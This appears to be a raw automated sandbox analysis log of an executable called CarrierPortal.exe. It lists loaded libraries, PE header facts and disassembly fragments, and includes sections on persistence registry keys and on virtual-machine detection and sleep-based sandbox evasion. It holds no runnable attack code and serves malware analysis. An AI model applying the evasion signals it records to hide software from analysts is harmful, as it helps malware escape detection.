Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: dxdiagn.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d12.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: devobj.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: winmmbase.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: wmiclnt.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: winbrand.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: dsound.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: devrtl.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: spinf.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: drvstore.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: spfileq.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: wifidisplay.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: wlanapi.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: mmdevapi.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: mfplat.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: rtworkq.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: mf.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: mfcore.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: ksuser.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: mfsensorgroup.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: comppkgsup.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: windows.media.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: windows.applicationmodel.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: dispbroker.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d12core.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: dxcore.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: dxilconv.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3dscache.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: dwmapi.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: mscat32.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d9.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: dwmapi.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: ddraw.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: dciman32.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: avrt.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: audioses.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: msacm32.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: midimap.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: dinput8.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: inputhost.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: hid.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: winmm.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: devenum.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: msdmo.dll
Source: C:\Windows\System32\dxdiag.exe | Section loaded: quartz.dll
Source: C:\Windows\System32\dxdiag.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32
Source: C:\Windows\System32\Taskmgr.exe | Window found: window name: SysTabControl32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: CarrierPortal.exe | Static PE information: certificate valid
Source: CarrierPortal.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: CarrierPortal.exe | Static PE information: Image base 0x140000000 > 0x60000000
Source: CarrierPortal.exe | Static file information: File size 21461272 > 1048576
Source: CarrierPortal.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x85c000
Source: CarrierPortal.exe | Static PE information: Raw size of .svm_hea is bigger than: 0x100000 < 0xbe0000
Source: CarrierPortal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: CarrierPortal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: CarrierPortal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: CarrierPortal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: CarrierPortal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: CarrierPortal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: CarrierPortal.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: CarrierPortal.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: BasicDisplay.pdb source: dxdiag.exe, 00000004.00000003.1198351485.000001D76470D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1729056136.00000143D2092000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BasicDisplay.pdbUGP source: dxdiag.exe, 00000004.00000003.1198351485.000001D76470D000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1729056136.00000143D2092000.00000004.00000020.00020000.00000000.sdmp
Source: CarrierPortal.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: CarrierPortal.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: CarrierPortal.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: CarrierPortal.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: CarrierPortal.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: CarrierPortal.exe | Static PE information: section name: .rodata
Source: CarrierPortal.exe | Static PE information: section name: .svm_hea
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_0000002D0D5CE968 push ecx; retf 0_2_0000002D0D5CE969
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_0000002D0D5CF1E2 push eax; iretd 0_2_0000002D0D5CF20A
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_0000002D0D5CEA9F push ecx; retf 0_2_0000002D0D5CEAA9
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_0000002D0D5CC772 push ecx; retf 0_2_0000002D0D5CC779
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_0000002D0D5CBEB0 push ecx; retf 0_2_0000002D0D5CBEB9
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_00000146244BF1D4 push eax; retf 0_2_00000146244BF1E9
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_00000146244D8468 pushad ; ret 0_2_00000146244D8469
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_00000146244D9708 pushad ; retf 0_2_00000146244D9709
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_00000146244D9FA1 pushad ; ret 0_2_00000146244D9FC1
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_00000146250236C0 push edi; retf 0_2_00000146250236C1
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 0_2_00000146250A390C push esp; retf 0006h 0_2_00000146250A390D
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 18_2_000000986673C888 push ecx; retf 18_2_000000986673C889
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 18_2_000000986673EA78 push ecx; retf 18_2_000000986673EA79
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 18_2_000000986673EBB8 push ecx; retf 18_2_000000986673EBB9
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 18_2_000000986673F318 push eax; iretd 18_2_000000986673F31A
Source: C:\Users\user\Desktop\CarrierPortal.exe | Code function: 18_2_000001E7771705D8 pushad ; retf 18_2_000001E7771705D9

Boot Survival

Source: C:\Windows\System32\Taskmgr.exe | Registry key monitored: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Windows\System32\Taskmgr.exe | Registry key monitored: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Source: C:\Windows\System32\Taskmgr.exe | Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\dxdiag.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\CarrierPortal.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\dxdiag.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\Taskmgr.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} WHERE ResultClass = Win32_DiskDrive
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk Where DriveType=3
Source: C:\Windows\System32\dxdiag.exe System information queried: FirmwareTableInformation
Source: C:\Windows\System32\Taskmgr.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8928
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 971
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4992 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\dxdiag.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: CarrierPortal.exe Binary or memory string: Native image does not support the following JVMCI CPU features:
Source: Taskmgr.exe, 00000019.00000003.1947836564.0000025B1CD62000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <Hyper-V Guest Shutdown Servicej
Source: CarrierPortal.exe Binary or memory string: jdk.graal.compiler.hotspot.HotSpotGraalJVMCIServiceLocator
Source: Taskmgr.exe, 00000019.00000003.1942278051.0000025B1CD74000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processord<
Source: CarrierPortal.exe Binary or memory string: com.oracle.svm.enterprise.virtualization.vmm.qemu
Source: Taskmgr.exe, 00000019.00000003.1920193468.0000025B1C890000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware Virtual disk SCSI Disk Devicennectio
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus Pipes&
Source: Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CE41000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CE41000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V HypervisorA
Source: CarrierPortal.exe Binary or memory string: :jdk.graal.compiler.hotspot.HotSpotGraalJVMCIServiceLocator
Source: CarrierPortal.exe Binary or memory string: 3com.oracle.svm.enterprise.virtualization.vmm.qemu.c
Source: CarrierPortal.exe Binary or memory string: 3com.oracle.svm.enterprise.virtualization.vmm.qemu.b
Source: CarrierPortal.exe Binary or memory string: Hyper-V RAW
Source: Taskmgr.exe, 00000019.00000003.1949755033.0000025B1CCC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CE5C000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partition
Source: Taskmgr.exe, 00000019.00000003.1967596461.0000025B1C8AE000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1920193468.0000025B1C890000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: imeW32TimeVolume Shadow CopyVSSHyper-V V
Source: ModuleAnalysisCache.16.dr Binary or memory string: Get-NetEventVmNetworkAdapter
Source: dxdiag.exe, 00000015.00000002.1820190933.00000143D4A89000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000015.00000003.1802129587.00000143D4A88000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6Microsoft Hyper-V Virtualization Infrastructure Driver8A
Source: Taskmgr.exe, 00000019.00000003.1947205276.0000025B1C303000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000002.1991617518.0000025B1C303000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition
Source: Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CDEF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: Taskmgr.exe, 00000019.00000003.1950231203.0000025B1CDC9000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1963572960.0000025B1CDC9000.00000004.00000020.00020000.00000000.sdmp, Taskmgr.exe, 00000019.00000003.1931402610.0000025B1CD17000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
